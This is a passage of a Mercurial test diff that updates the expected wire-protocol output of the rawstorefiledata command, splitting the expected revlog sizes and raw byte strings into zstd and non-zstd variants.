\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash sending capabilities command s> setsockopt(6, 1, 1) -> None (?) s> POST /api/exp-http-v2-0003/ro/capabilities HTTP/1.1\r\n diff --git a/tests/test-wireproto-command-rawstorefiledata.t b/tests/test-wireproto-command-rawstorefiledata.t --- a/tests/test-wireproto-command-rawstorefiledata.t +++ b/tests/test-wireproto-command-rawstorefiledata.t @@ -56,14 +56,17 @@ response: gen[ { b'filecount': 1, - b'totalsize': 527 + b'totalsize': 527 (no-zstd !) + b'totalsize': 530 (zstd !) }, { b'location': b'store', b'path': b'00changelog.i', - b'size': 527 + b'size': 527 (no-zstd !) + b'size': 530 (zstd !) }, - b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !) + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !) b'' ] @@ -78,14 +81,17 @@ response: gen[ { b'filecount': 1, - b'totalsize': 584 + b'totalsize': 584 (no-zstd !) + b'totalsize': 588 (zstd !) }, { b'location': b'store', b'path': b'00manifest.i', - b'size': 584 + b'size': 584 (no-zstd !) + b'size': 588 (zstd !) }, - b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', + b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !) + b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !) b'' ] @@ -100,21 +106,26 @@ response: gen[ { b'filecount': 2, - b'totalsize': 1111 + b'totalsize': 1111 (no-zstd !) + b'totalsize': 1118 (zstd !) }, { b'location': b'store', b'path': b'00manifest.i', - b'size': 584 + b'size': 584 (no-zstd !) + b'size': 588 (zstd !) }, - b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', + b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !) + b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !) b'', { b'location': b'store', b'path': b'00changelog.i', - b'size': 527 + b'size': 527 (no-zstd !) + b'size': 530 (zstd !) }, - b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 